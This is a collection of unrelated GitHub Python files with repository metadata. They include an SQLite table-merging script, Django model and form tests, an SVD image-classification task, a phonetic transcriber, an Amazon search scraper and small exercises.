pc_cnt:\n\"\"\" output table has been created ================\"\"\"\n\n\"\"\" merging columns with personId ==============\"\"\"\n\ncuri = inp.cursor()\n\n# receiving the values in the rows with personId in each table\nt0_cc = []\nSQL_st = \"SELECT \" + cc + \" FROM \" + t_names[0]\nfor val in curi.execute(SQL_st).fetchall():\n    t0_cc.append(val)\n# end for\n\nt1_cc = []\nSQL_st = \"SELECT \" + cc + \" FROM \" + t_names[1]\nfor val in curi.execute(SQL_st).fetchall():\n    t1_cc.append(val)\n# end for\n\n\"\"\"\n1) check personId in the 1st table,\n2) take the values of the corresponding row from the 1st table\n3) check if the second table has the same personId value\n3.5) delete the value from the list to prevent double usage\n4) take the values of the corresponding row from the 2nd table\n5) add values from 4) to the list with values from 2)\n6) write the list into table 3\n\"\"\"\nfor val in t0_cc:\n    row_val = []\n    SQL_st = \"SELECT * FROM \" + t_names[0] + \" WHERE \" + cc + \" = \" + str(val[0])\n    cc_t0 = curi.execute(SQL_st).fetchone()\n    # adding into the resulting row all values except for the first 2\n    for i in range(len(cc_t0)-2):\n        row_val.append(cc_t0[i+2])\n    # end for\n\n    if val in t1_cc:\n        SQL_st = \"SELECT * FROM \" + t_names[1] + \" WHERE \" + cc + \" = \" + str(val[0])\n        cc_t1 = curi.execute(SQL_st).fetchone()\n        # adding into the resulting row all values except for the first 3\n        for j in range(len(cc_t1)-3):\n            row_val.append(cc_t1[j+3])\n        # end for\n        t1_cc.remove(val)\n    # end if val in t1_cc:\n    else:\n        for i in range(len(address_cn)-2): # -2 (not -3) due to the automatically created column\n            row_val.append('Null')\n        # end for\n    # end else\n    # writing the row into the output table\n    SQL_st = sqf.SQL_INSERT_INTO(\n        t_names[2],\n        pc_cn,\n        row_val)\n    curo.execute(SQL_st)\n    # end for val in t0_cc:\n\n\"\"\"\n1) check the remaining list of personId -> t1_cc,\n2) for each value in the list take the corresponding row\n3) create the row for the new table with absent columns filled with None\n4) write the row into the table\n\"\"\"\n\nfor val in t1_cc: # only elements different from t0_cc remain\n    row_val = []\n    for i in range(len(person_cn)-1): # -1 (not -2) due to the automatically created column\n        row_val.append('Null')\n    # end for\n    SQL_st = \"SELECT * FROM \" + t_names[1] + \" WHERE \" + cc + \" = \" + str(val[0])\n    cc_t1 = curi.execute(SQL_st).fetchone()\n    # adding into the resulting row all values except for the first 3\n    for j in range(len(cc_t1)-3):\n        row_val.append(cc_t1[j+3])\n    # end for\n    # writing the row into the output table\n    SQL_st = sqf.SQL_INSERT_INTO(\n        t_names[2],\n        pc_cn,\n        row_val)\n    curo.execute(SQL_st)\n\n\n\"\"\" columns with personId have been merged ==============\"\"\"\noutp.commit() # committing changes into output DB, do not commit into input DB\noutp.close() # outp = sqlite3.connect(o_p)\ninp.close() # inp = sqlite3.connect(i_p)\n", "repo_name": "YuriiNev/Leetcode_tasks_python", "sub_path": "01_leetcode_175.py", "file_name": "01_leetcode_175.py", "file_ext": "py", "file_size_in_byte": 10558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 149, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_CREATE_Table", "line_number": 154, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_ADD_Column", "line_number": 159, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_INSERT_INTO", "line_number": 
169, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_CV_list", "line_number": 173, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_CV_list", "line_number": 174, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_CREATE_Table", "line_number": 182, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_ADD_Column", "line_number": 187, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_INSERT_INTO", "line_number": 197, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 211, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 212, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_CREATE_Table", "line_number": 219, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_ADD_Column", "line_number": 233, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_INSERT_INTO", "line_number": 296, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_INSERT_INTO", "line_number": 322, "usage_type": "call"}]} +{"seq_id": "29670682757", "text": "from __future__ import unicode_literals, absolute_import\n\nimport csv\nimport os\nimport re\n\ntry:\n from df2gspread import gspread2df\nexcept:\n gspread2df = None\n\nis_local_file = re.compile('^(file://)?(\\/?.+)$')\n\n\ndef input_gload(uri, column='Username', wks_name=None):\n if not gspread2df:\n raise RuntimeError('df2gspread is not installed')\n df = gspread2df.download(uri, wks_name, col_names=True)\n pool = df[column]\n return pool.values\n\n\ndef input_load(uri, column='Username'):\n uri = os.path.expanduser(uri)\n protocol, uri = is_local_file.match(uri).groups()\n if not protocol:\n f = open(uri)\n pool = [r[column] for r in csv.DictReader(f)]\n else:\n raise RuntimeError\n return pool\n\n\ndef input_filter(pool, exclude):\n pool = set(pool or [])\n exclude = set(exclude or [])\n return pool - exclude\n", "repo_name": "calmrat/rafflepy", "sub_path": "rafflepy/raffle.py", "file_name": "raffle.py", "file_ext": "py", "file_size_in_byte": 859, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "df2gspread.gspread2df", "line_number": 10, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 12, "usage_type": "call"}, {"api_name": "df2gspread.gspread2df", "line_number": 16, "usage_type": "name"}, {"api_name": "df2gspread.gspread2df.download", "line_number": 18, "usage_type": "call"}, {"api_name": "df2gspread.gspread2df", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "csv.DictReader", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "12880399473", "text": "from django.http import HttpRequest\nfrom django.template.loader import render_to_string\nfrom django.test import TestCase\nfrom django.urls import resolve\nfrom django.utils.timezone import now\n\nfrom .forms import WatchlistForm\nfrom .models import Industry\nfrom .views import index\n\n\nclass IndustryModelTests(TestCase):\n def test_is_empty(self):\n \"\"\" test No.1: テーブルは0件です\"\"\"\n saved_industry = Industry.objects.all()\n self.assertEqual(saved_industry.count(), 0)\n\n def test_is_not_empty(self):\n \"\"\"test No.2: 1つ登録すれば保存されたレコード数は1\"\"\"\n industry = Industry()\n industry.pub_date = now()\n industry.save()\n saved_industries = Industry.objects.all()\n self.assertEqual(saved_industries.count(), 
1)\n\n    def test_saving_and_get_industry(self):\n        \"\"\"test No.3: the data before insertion and the data after insertion are equal\"\"\"\n        first_industry = Industry()\n        market_code, symbol, company_name = \"HOSE\", \"AAA\", \"アンファット・バイオプラスチック\"\n        first_industry.market_code = market_code\n        first_industry.symbol = symbol\n        first_industry.company_name = company_name\n        first_industry.pub_date = now()\n        first_industry.save()\n        saved_industries = Industry.objects.all()\n        actual_industry = saved_industries[0]\n        self.assertEqual(actual_industry.market_code, market_code)\n        self.assertEqual(actual_industry.symbol, symbol)\n        self.assertEqual(actual_industry.company_name, company_name)\n\n\nclass UrlResolveTests(TestCase):\n    def test_url_resolves_to_book_list_view(self):\n        \"\"\"test No.4: verify that index is called for /\"\"\"\n        found = resolve('/')\n        self.assertEqual(found.func, index)\n\n\n# class HtmlTests(TestCase):\n#     def test_book_list_page_returns_correct_html(self):\n#         \"\"\"test No.5: verify the HTML for /\"\"\"\n#         request = HttpRequest()\n#         response = index(request)\n#         expected_html = render_to_string('/')\n#         self.assertEqual(response.content.decode(), expected_html)\n\n\nclass FormTests(TestCase):\n    def test_valid(self):\n        \"\"\"test No.6: valid input does not produce an error\"\"\"\n        params = dict(symbol='HOSE', bought_day=now(), stocks_price=1000, stocks_count=500)\n        industry = Industry()\n        form = WatchlistForm(params, instance=industry)\n        self.assertTrue(form.is_valid())\n\n    def test_either1(self):\n        \"\"\"test No.7: verify that empty input produces an error\"\"\"\n        params = dict()\n        industry = Industry()\n        form = WatchlistForm(params, instance=industry)\n        self.assertFalse(form.is_valid())\n\n\nclass CanSaveAPostRequestAssert(TestCase):\n    def assertFieldInResponse(self, response, name, page, publisher):\n        self.assertIn(name, response.content.decode())\n        self.assertIn(page, response.content.decode())\n        self.assertIn(publisher, response.content.decode())\n\n\nclass CanSaveAPostRequestTests(CanSaveAPostRequestAssert):\n    def post_request(self, name, page, publisher):\n        request = HttpRequest()\n        request.method = 'POST'\n        request.POST['name'] = name\n        request.POST['page'] = page\n        request.POST['publisher'] = publisher\n        return request\n\n    # def test_book_edit_can_save_a_post_request(self):\n    #     name, page, publisher = 'name', 'page', 'publisher'\n    #     request = self.post_request(name, page, publisher)\n    #     response = index(request)\n    #     self.assertFieldInResponse(response, name, page, publisher)\n", "repo_name": "tdev1999/Portfolio", "sub_path": "mysite/vietnam_research/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3650, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Industry.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Industry.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Industry", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Industry", "line_number": 20, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Industry.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Industry.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Industry", "line_number": 23, "usage_type": "name"}, {"api_name": "models.Industry", "line_number": 28, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", 
"line_number": 33, "usage_type": "call"}, {"api_name": "models.Industry.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Industry.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.Industry", "line_number": 35, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 42, "usage_type": "name"}, {"api_name": "django.urls.resolve", "line_number": 45, "usage_type": "call"}, {"api_name": "views.index", "line_number": 46, "usage_type": "argument"}, {"api_name": "django.test.TestCase", "line_number": 58, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 61, "usage_type": "call"}, {"api_name": "models.Industry", "line_number": 62, "usage_type": "call"}, {"api_name": "forms.WatchlistForm", "line_number": 63, "usage_type": "call"}, {"api_name": "models.Industry", "line_number": 69, "usage_type": "call"}, {"api_name": "forms.WatchlistForm", "line_number": 70, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 74, "usage_type": "name"}, {"api_name": "django.http.HttpRequest", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "213953499", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[154]:\n\n\n# Task 1\n# Add all the required libraries here, will be using dimensionality reduction technique of SVD\nimport torch\nimport numpy as np\nimport pandas as pd\nimport re\nimport warnings \nwarnings.filterwarnings('ignore')\n\n# In[155]:\n\n\n# Adding all the required functions here\n# parse_string function\ndef parse_string(string):\n values = re.findall(r'-?\\d+\\.\\d+', string)\n np_array = np.array(values, dtype=float)\n return torch.tensor(np_array, dtype=torch.float32)\n\n# this function is to perform SVD\ndef svd(k, feature_matrix):\n covariance_matrix_1 = np.dot(feature_matrix.T, feature_matrix)\n eigenvalues_1, eigenvectors_1 = np.linalg.eig(covariance_matrix_1)\n ncols1 = np.argsort(eigenvalues_1)[::-1]\n covariance_matrix_2 = np.dot(feature_matrix, feature_matrix.T)\n eigenvalues_2, eigenvectors_2 = np.linalg.eig(covariance_matrix_2)\n ncols2 = np.argsort(eigenvalues_2)[::-1]\n v_transpose = eigenvectors_1[ncols1].T\n u = eigenvectors_2[ncols2]\n sigma = np.diag(np.sqrt(eigenvalues_1)[::-1])\n trucated_u = u[:, :k]\n trucated_sigma = sigma[:k, :k]\n truncated_v_transpose = v_transpose[:k, :]\n image_to_latent_features = feature_matrix @ truncated_v_transpose.T\n latent_feature_to_original_feature = truncated_v_transpose\n # svd = TruncatedSVD(n_components=k)\n # reduced_data = svd.fit_transform(feature_matrix)\n # image_to_latent_features = feature_matrix @ v_transpose.T\n # latent_feature_to_original_feature = v_transpose\n return image_to_latent_features, latent_feature_to_original_feature\n\n# for each label, I am going to do label semantic analysis, one by one, the value of k=10\ndef perform_svd(k, data, labels):\n # first thing I need to do is convert everything to a numpy array so that I can pass to the SVD function\n reduced_features = {}\n for label in labels:\n label_data = data.get_group(label)[feature_model]\n # Convert the list of arrays to a 2D NumPy array\n list_data = np.vstack([np.array(image) for image in label_data])\n\n # Performing Singular Value Decomposition (SVD)\n image_to_latent_features, _ = svd(k, list_data)\n\n # Storing the reduced features in the dictionary\n reduced_features[label] = image_to_latent_features\n return reduced_features\n\ndef cosine_similarity(vector_a, vector_b):\n # Calculated the dot product of the two vectors\n 
dot_product = np.dot(vector_a, vector_b)\n\n # Calculated the Euclidean norm (magnitude) of each vector\n norm_a = np.linalg.norm(vector_a)\n norm_b = np.linalg.norm(vector_b)\n\n # Calculated the cosine similarity\n similarity = dot_product / (norm_a * norm_b)\n return similarity\n\ndef calculate_similarity(latent_semantics1, latent_semantics2):\n \"\"\"Calculate the cosine similarity between two latent semantics.\"\"\"\n return cosine_similarity(latent_semantics1, latent_semantics2)\n\ndef calculate_total_accuracy(predicted_labels):\n total_num = 0\n true_positives = 0\n for label in predicted_labels.keys():\n for image_label in predicted_labels[label]:\n total_num += 1\n if image_label == label:\n true_positives += 1\n return true_positives/total_num\n\n# function to calculate per-label precision, recall, and F1-score\ndef calculate_metrics(predicted_labels):\n num_labels = len(predicted_labels)\n label_metrics = {}\n for label in predicted_labels.keys():\n true_positives = 0\n false_positives = 0\n false_negatives = 0\n for image_label in predicted_labels[label]:\n if image_label == label:\n true_positives += 1\n else:\n false_positives += 1\n false_negatives = num_labels - true_positives # All instances not considered as true positives\n\n precision = true_positives / (true_positives + false_positives) if (true_positives + false_positives) > 0 else 0\n recall = true_positives / (true_positives + false_negatives) if (true_positives + false_negatives) > 0 else 0\n f1_score = 2 * (precision * recall) / (precision + recall) if (precision + recall) > 0 else 0\n label_metrics[label] = [precision, recall, f1_score]\n return label_metrics\n\ndef print_metrics(label_metrics, predicted_labels):\n for label in label_metrics:\n print(f\"Label {label}: Precision: {label_metrics[label][0]}, Recall: {label_metrics[label][1]}, f1 Score: {label_metrics[label][2]}.\")\n print(f\"Total accuracy: {calculate_total_accuracy(predicted_labels)}\")\n \ndef select_feature_model(option):\n if option == 1:\n return \"HOG\"\n elif option == 2:\n return \"ColorMoments\"\n elif option == 3:\n return \"ResNet_AvgPool_1024\"\n elif option == 4:\n return \"ResNet_Layer3_1024\"\n else:\n return \"ResNet_FC_1000\"\n \n\n\n# In[156]:\n\n\n# Step 1: Feature Extraction and Storage\n# reading the feature file and using the resnet fc model for extraction\ndf = pd.read_csv('../FD_Objects.csv')\n\nfeature_option = int(input(\"Please pick one of the below options\\n\"\n \"1. HOG\\n\"\n \"2. Color Moments\\n\"\n \"3. Resnet Layer 3\\n\"\n \"4. Resnet Avgpool\\n\"\n \"5. 
Resnet FC\\n\"\n \"--------------\\n\"))\nk = int(input(\"Please enter the value of k: \"))\n\nfeature_model = select_feature_model(feature_option)\ndf[feature_model] = df[feature_model].apply(parse_string)\n\n# Convert the column to a NumPy array\nnumpy_array = df[feature_model].to_numpy()\n\n# extracting the even and odd feature set \neven_data = df.iloc[::2]\nodd_data = df.iloc[1::2]\n\n# extracting labels\ngrouped_data_even = even_data.groupby('Labels')\nlabels = list(grouped_data_even.groups.keys())\n\n\n# In[157]:\n\n\n# Step 2: Latent Semantic Analysis (LSA)\n\n# getting reduced data for even images in the label\nreduced_feature_even = perform_svd(k, grouped_data_even, labels)\n\n# getting reduced data for odd images in the label\ngrouped_data_odd = odd_data.groupby('Labels')\nreduced_feature_odd = perform_svd(k, grouped_data_odd, labels)\n\n\n# In[158]:\n\n\n# now we need to compare the similarity measure of each of the odd data with the even data images\npredicted_label = {}\n\nfor label_odd in reduced_feature_odd.keys():\n predicted_label[label_odd] = []\n #comparing each odd image with even image\n for i in range(len(reduced_feature_odd[label_odd])):\n min_distance = np.zeros(5)\n label_min_distance = np.zeros(5)\n for label_even in reduced_feature_even.keys():\n for j in range(len(reduced_feature_even[label_even])):\n # now you can compare each odd image with each even image\n similarity = calculate_similarity(reduced_feature_odd[label_odd][i] , reduced_feature_even[label_even][j])\n #see if the similarity is greater than the values currently stored\n if similarity > np.max(min_distance):\n# print(\"coming here\", similarity, np.max(min_distance), min_distance)\n min_index = np.argmin(min_distance)\n min_distance[min_index] = similarity\n label_min_distance[min_index] = label_even\n \n \n# print(similarity)\n# print(label_odd, i,label_even, j, similarity)\n \n# break\n# max_index = np.where(min_distance == max(min_distance))\n most_frequent_value_np = np.bincount(label_min_distance.astype(int)).argmax()\n \n# print(i,most_frequent_value_np)\n predicted_label[label_odd].append(most_frequent_value_np)\n# break\n# break\n\n \n\n\n# In[159]:\n\n\nlabel_metrics = calculate_metrics(predicted_label)\nprint_metrics(label_metrics, predicted_label)\n\n", "repo_name": "rajat98/CSE-515-MWD-phase-3", "sub_path": "Code/Task1.py", "file_name": "Task1.py", "file_ext": "py", "file_size_in_byte": 7894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "warnings.filterwarnings", "line_number": 14, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 36, 
"usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 203, "usage_type": "call"}]} +{"seq_id": "5102240202", "text": "from datetime import datetime, timedelta\n\na = int(input())\nb = int(input())\nc = int(input())\n\nlist = (a, b, c)\nresult = sum(list)\n\ntime = datetime(2020, 3, 22) \ndelta = timedelta( seconds = result)\nprint(str(delta)[slice(3, 10)])\n\n\n# 35, 45, 44 \n# 22, 7, 34\n# 50, 50, 49\n", "repo_name": "byAbaddon/Basics-Course-Python-March-2020", "sub_path": "3.1 Condition Statments Exersise/01-sum-seconds.py", "file_name": "01-sum-seconds.py", "file_ext": "py", "file_size_in_byte": 271, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "7297207632", "text": "\r\n'''\r\nTool that helps in phonetic transcription. Enter a text and it will transcribe it automatically without considering the weak forms.\r\n'''\r\nimport requests\r\nimport re\r\nimport nltk\r\nimport argparse\r\nfrom pathlib import Path\r\n\r\n# TODO: implement -i as user input for text files and -o as user output (as a .txt file)\r\n# TODO: implement a loading bar that would take a total number of words and show the speed and eta\r\n# TODO: eventually more object-oriented to speed up the script; store the already fetched data \r\n\r\ndef arg_parse():\r\n parser = argparse.ArgumentParser(\r\n prog='phonetic_transcriber.py',\r\n description='Tool that helps in phonetic transcription. Enter a text or a file as input (-i) and it will transcribe it automatically without considering the weak forms.')\r\n parser.add_argument(\"-input\", \"-i\", type=Path, required=False, help=\"Type in the path to the file that you want to transcribe; i.e.: -i ~/my_text.txt\")\r\n args = parser.parse_args()\r\n \r\n if args.input:\r\n print(f'File path provided: {args.input}, processing...')\r\n return args\r\n else:\r\n print('No file path provided. 
Proceeding with typed text.')\r\n\r\ndef file_reader(text_file) -> str:\r\n with open(text_file, 'r') as read_file:\r\n content = read_file.read()\r\n return content\r\n\r\ndef punctuation_removal(input) -> list:\r\n tokenizer = nltk.RegexpTokenizer(r\"\\b\\w+(?:'\\w+)?\\b\")\r\n words_without_punctuation = tokenizer.tokenize(input.lower())\r\n return words_without_punctuation\r\n\r\ndef transcribe():\r\n args = arg_parse()\r\n # Check if file has been inserted\r\n if args == None:\r\n raw_input = input(\"Please insert the word in English that you want to be transcribed!\\n\")\r\n else:\r\n text_file = args.input.expanduser()\r\n raw_input = file_reader(text_file)\r\n\r\n final_phonetic_transcription = '/ '\r\n \r\n # TODO: fix the edgecase 'i'; eventually find a better way to search for 'phonetic' key\r\n # TODO: apply json for better script management\r\n\r\n for word in punctuation_removal(raw_input):\r\n get_data = requests.get(f'{dictionary_url}{word}')\r\n if get_data.status_code == 200:\r\n store_data = get_data.json()\r\n # different methods to find the phonetic transcription in the generated .json\r\n try:\r\n phonetics_string = store_data[0]['phonetics']\r\n phonetic_transcription = phonetics_string[1]['text']\r\n except IndexError:\r\n phonetic_transcription = store_data[0]['phonetic']\r\n finally:\r\n escape_char = re.escape('/') \r\n final_phonetic_transcription = final_phonetic_transcription + re.sub(escape_char, '', phonetic_transcription) + ' '\r\n elif get_data.status_code == 404:\r\n print(f'Sorry, word \"{word}\" not found.') \r\n else: \r\n print(f'API request failed with status code {get_data.status_code}')\r\n\r\n final_phonetic_transcription += '/'\r\n print(final_phonetic_transcription)\r\n\r\n# add X-SAMPA dictionary for its later conversion\r\n x_sampa = {\r\n \"ɪ\": \"I\",\r\n \"æ\": \"{\",\r\n \"ʌ\": \"V\",\r\n \"ə\": \"@\",\r\n \"ɜ\": \"E\",\r\n \"ɑ\": \"A\",\r\n \"ɒ\": \"Q\",\r\n \"ɔ\": \"O\",\r\n \"ʊ\": \"U\",\r\n \"θ\": \"T\",\r\n \"ð\": \"D\",\r\n \"ʃ\": \"S\",\r\n \"ʒ\": \"Z\",\r\n \"ŋ\": \"N\"\r\n }\r\n\r\n final_phonetic_transcription_x_sampa = ''\r\n for character in final_phonetic_transcription:\r\n if character in x_sampa:\r\n character = x_sampa[character]\r\n final_phonetic_transcription_x_sampa += character\r\n else:\r\n final_phonetic_transcription_x_sampa += character \r\n print(final_phonetic_transcription_x_sampa)\r\n\r\nif __name__ == '__main__':\r\n# Download nltk resources (if not already downloaded)\r\n nltk.download('punkt')\r\n dictionary_url = 'https://api.dictionaryapi.dev/api/v2/entries/en/'\r\n transcribe()", "repo_name": "vaex91/phonetic_transcription", "sub_path": "phonetic_transcriber.py", "file_name": "phonetic_transcriber.py", "file_ext": "py", "file_size_in_byte": 3981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 19, "usage_type": "name"}, {"api_name": "nltk.RegexpTokenizer", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 53, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 63, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 64, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "73886526275", "text": "# encoding='utf-8\n\n# @Time: 2023-01-28\n# @File: %\n#!/usr/bin/env\nimport requests\nfrom icecream import 
ic\nimport os\nos.chdir(os.path.abspath(os.path.dirname(__file__)))\n# change cwd to current file dir\n\nsession = requests.Session()\n\n# ==================== 1.0 US code session====================\nheaders = {\n 'authority': 'www.amazon.com',\n 'accept': 'text/html,*/*',\n 'accept-language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',\n 'anti-csrftoken-a2z': 'gDseJ7z1FruolG1l4bRc7Z6eaMQThpfuuX3LmqwAAAAMAAAAAGPVKNVyYXcAAAAA;hO1bhlKylde6GiGaBm2Asx6WCdde+IjCu8HRgBY1LQNTAAAAAGPVKNUAAAAB',\n 'cache-control': 'no-cache',\n 'content-type': 'application/json',\n # 'cookie': 'session-id=141-8324378-3408564; session-id-time=2082787201l; i18n-prefs=USD; skin=noskin; ubid-main=133-9964420-2947024; session-token=\"4uvVDwnTor/E4Itenk4LSD2wBNatL5zSkdwVX6lVtnc2R8PbWwWpjWR53v7PtIQmPtrWCg4tHeZ2g8WIPU4MQ8Zz7fYDpRRkuch33Aj/zRteDQJx++Q7+36ZGp8CANYsDWCtD9ofUxlSuw9xYuGGFgwDja8UsmztEAWAUQPy7jyIcSvn2pM/jJ3cl+xLPXv2NrHq8oTah3Kv4D/FDzAcrQ/7HJrRgD8ci7I5T5QkXo4=\"; csm-hit=tb:JD25YD8VDSHNBJQP7MS5+s-JD25YD8VDSHNBJQP7MS5|1674914117160&t:1674914117160&adb:adblk_no',\n 'device-memory': '4',\n 'downlink': '1.3',\n 'dpr': '0.8',\n 'ect': '3g',\n 'origin': 'https://www.amazon.com',\n 'pragma': 'no-cache',\n 'referer': 'https://www.amazon.com/',\n 'rtt': '350',\n 'sec-ch-device-memory': '4',\n 'sec-ch-dpr': '0.8',\n 'sec-ch-ua': '\"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"108\", \"Google Chrome\";v=\"108\"',\n 'sec-ch-ua-mobile': '?0',\n 'sec-ch-ua-platform': '\"Linux\"',\n 'sec-ch-ua-platform-version': '\"5.15.82\"',\n 'sec-ch-viewport-width': '893',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',\n 'viewport-width': '893',\n 'x-requested-with': 'XMLHttpRequest',\n}\n\nparams = (\n ('actionSource', 'glow'),\n)\n\ndata = '{\"locationType\":\"LOCATION_INPUT\",\"zipCode\":\"52325\",\"storeContext\":\"generic\",\"deviceType\":\"web\",\"pageType\":\"Gateway\",\"actionSource\":\"glow\"}'\n\n# add headers to session\nsession.headers.update(headers)\n\nresponse = session.post('https://www.amazon.com/portal-migration/hz/glow/address-change',\n params=params, data=data)\n# print(response.text)\n\n# NB. Original query string below. It seems impossible to parse and\n# reproduce query strings 100% accurately so the one below is given\n# in case the reproduced version is not \"correct\".\n# response = requests.post('https://www.amazon.com/portal-migration/hz/glow/address-change?actionSource=glow', headers=headers, data=data)\n# ==================== 2.0 get items list====================\n\n\nparams = (\n ('k', 'macbook case'),\n ('crid', '1YWGI5BSFG866'),\n ('sprefix', 'macbook case,aps,553'),\n ('ref', 'nb_sb_noss_1'),\n)\n\nresponse = session.get('https://www.amazon.com/s', params=params)\n# with open('macbook_case.html', 'w') as f:\n# f.write(response.text)\n\n# NB. Original query string below. 
It seems impossible to parse and\n# reproduce query strings 100% accurately so the one below is given\n# in case the reproduced version is not \"correct\".\n# response = requests.get('https://www.amazon.com/s?k=macbook+case&crid=1YWGI5BSFG866&sprefix=macbook+case%2Caps%2C553&ref=nb_sb_noss_1', headers=headers)\n", "repo_name": "yuzhegan/spider", "sub_path": "amazon/Amz.py", "file_name": "Amz.py", "file_ext": "py", "file_size_in_byte": 3384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.chdir", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "7055987195", "text": "import datetime\n\nfrom pymongo import MongoClient\n\nclient = MongoClient('localhost', 27017)\ndb = client['Hogwarts']\ncollection = db['students']\n\n\nmagic_skills = ['Animagi', 'Metamorphmagi',\n 'Parseltongue', 'Seers',\n 'Legilimency and Occlumency',\n 'Apparition and Disapparition',\n 'Teleportation', 'Veela Charm',\n 'Magical Resistence']\n\nall_courses = ['Transfiguration',\n 'Defence Against the Dark Arts',\n 'Charms', 'Potion', 'Astronomy',\n 'History of Magic', 'Herbology',\n 'Arithmancy', 'Study of Ancient Runes',\n 'Divination', 'Care of Magical Creatures',\n 'Muggle Studies', 'Alchemy', 'Flying',\n 